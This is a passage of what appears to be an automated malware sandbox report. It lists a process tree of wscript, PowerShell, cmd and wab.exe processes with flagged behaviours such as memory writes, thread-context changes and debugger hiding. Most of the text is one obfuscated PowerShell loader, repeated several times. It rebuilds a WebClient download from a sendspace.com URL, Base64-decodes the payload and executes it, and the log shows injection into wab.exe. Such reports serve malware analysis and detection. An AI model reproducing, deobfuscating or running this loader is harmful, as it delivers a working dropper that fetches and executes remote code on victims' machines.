';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:2732

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1232

C:\Windows\system32\taskmgr.exe
taskmgr.exe /2
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2108

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:768

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x48c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\download.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:2252

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:1744

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\download.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb 